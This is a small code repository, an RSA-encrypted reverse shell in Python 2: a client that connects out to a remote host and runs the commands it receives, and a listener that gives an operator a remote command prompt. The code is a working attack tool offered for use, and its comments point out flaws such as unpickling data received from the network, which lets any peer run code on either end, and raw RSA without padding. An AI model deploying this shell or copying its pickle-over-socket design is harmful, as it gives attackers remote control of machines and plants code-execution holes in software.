├── README.md
├── reverse_shell_rsa.py
└── listener_rsa.py

/README.md:
--------------------------------------------------------------------------------
1 | # RSA-reverse-shell
2 | Python implementation of RSA reverse shell.
3 | 
--------------------------------------------------------------------------------
/reverse_shell_rsa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | 
3 | import socket, subprocess, sys
4 | from Crypto.PublicKey import RSA
5 | from Crypto.Hash import SHA256
6 | import pickle
7 | 
8 | 
9 | RHOST = sys.argv[1]
10 | RPORT = 4444
11 | 
12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 | s.connect((RHOST, RPORT))
14 | 
15 | def receive_key():
16 |     # Reads at most 1024 bytes from the peer and returns them raw. There is no
17 |     # authentication of the peer or of the key material: whoever answers at
18 |     # RHOST:RPORT, or can tamper with traffic on the path, supplies the key that
19 |     # every reply below is encrypted to.
20 |     data_key = s.recv(1024)
21 |     return data_key
22 | 
23 | pickled_publickey = receive_key()
24 | # SECURITY: pickle.loads() on bytes received from the network. Unpickling
25 | # executes arbitrary code chosen by the sender, so any peer (or MITM) that can
26 | # deliver this "key" gets code execution here before a single command is run.
27 | # The library already offers RSA.importKey()/exportKey() for serialising keys.
28 | public_key = pickle.loads(pickled_publickey)
29 | 
30 | 
31 | while True :
32 |     # Commands arrive in plaintext with no authentication or integrity check;
33 |     # only the replies are encrypted. Network monitoring therefore sees every
34 |     # command issued over this channel verbatim.
35 |     command = s.recv(1024)
36 |     if command == 'quit' :
37 |         break
38 |     # Spawns a process from the received bytes; stdout and stderr are captured
39 |     # but only stdout is returned to the peer.
40 |     reply = subprocess.Popen(str(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
41 |     stdout, stderr = reply.communicate()
42 |     # Legacy PyCrypto encrypt(): raw (textbook) RSA with no padding. The second
43 |     # argument is ignored by the library. Output is deterministic for a given
44 |     # plaintext, carries no integrity protection, and the plaintext cannot be
45 |     # larger than the modulus (~256 bytes for this 2048-bit key).
46 |     en_reply = public_key.encrypt(stdout, 32)
47 |     s.send(pickle.dumps(en_reply))
48 | 
49 | s.close()
50 | 
51 | 
52 | 
53 | 
54 | 
55 | 
--------------------------------------------------------------------------------
/listener_rsa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | 
3 | from Crypto.PublicKey import RSA
4 | from Crypto import Random
5 | from Crypto.Hash import SHA256
6 | import socket
7 | from thread import *
8 | import sys
9 | import pickle
10 | 
11 | 
12 | # A fresh 2048-bit RSA key pair is generated per listener run; nothing on
13 | # either side verifies that the public key a client receives is this one.
14 | random_generator = Random.new().read
15 | key = RSA.generate(2048, random_generator)
16 | public_key = key.publickey()
17 | 
18 | # Binds on every interface. Any host that can reach this port is handled
19 | # exactly like the intended client (see the pickle.loads() note below).
20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 | try:
22 |     s.bind(("0.0.0.0", 4444))
23 | except socket.error, v:
24 |     # Python 2 syntax (print statement, `except X, v`); the same applies to
25 |     # raw_input() and the `thread` module used below.
26 |     print "Binding failed. Error code : " + str(v[0]) + " Message " + v[1]
27 |     sys.exit()
28 | 
29 | 
30 | print "Socket bind complete"
31 | 
32 | s.listen(2)
33 | print "[+] Listening to the incoming connection on port 4444..."
34 | 
35 | def clientthread_sendpublickey(client) :
36 |     # Ships the public key as a pickle over the unauthenticated connection.
37 |     # The client side unpickles it, so this framing choice is what exposes the
38 |     # client to arbitrary code execution by anyone who can answer first.
39 |     client.send(pickle.dumps(public_key))
40 | 
41 | def clienthandle(client) :
42 |     # Reads operator input and sends it to the peer in plaintext (no
43 |     # encryption, authentication or integrity on the command channel).
44 |     while True :
45 |         command = raw_input('~$ ')
46 |         client.send(command)
47 |         if command == 'quit' :
48 |             break
49 |         buf = client.recv(2048)
50 |         # SECURITY: pickle.loads() on bytes from an unauthenticated peer.
51 |         # Any host that connects to port 4444 and sends a crafted pickle runs
52 |         # code on the operator's machine; this end is as exposed as the client.
53 |         encreply = pickle.loads(buf)
54 |         # Raw RSA decrypt with no padding or integrity check; whatever the peer
55 |         # sent is decrypted and printed to the terminal as-is.
56 |         print key.decrypt(encreply)
57 | 
58 | while True:
59 |     # No access control on accept(): every connection is served.
60 |     (client, (ip, port)) = s.accept()
61 |     print "Received connection from : ", ip
62 |     start_new_thread(clientthread_sendpublickey, (client,))
63 |     print "Public Key sent to", ip
64 |     start_new_thread(clienthandle, (client,))
65 | 
66 | 
67 | 
68 | 
69 | 
70 | 
71 | 
72 | 
73 | 
74 | 
75 | 
76 | 
77 | 
78 | 
79 | 
--------------------------------------------------------------------------------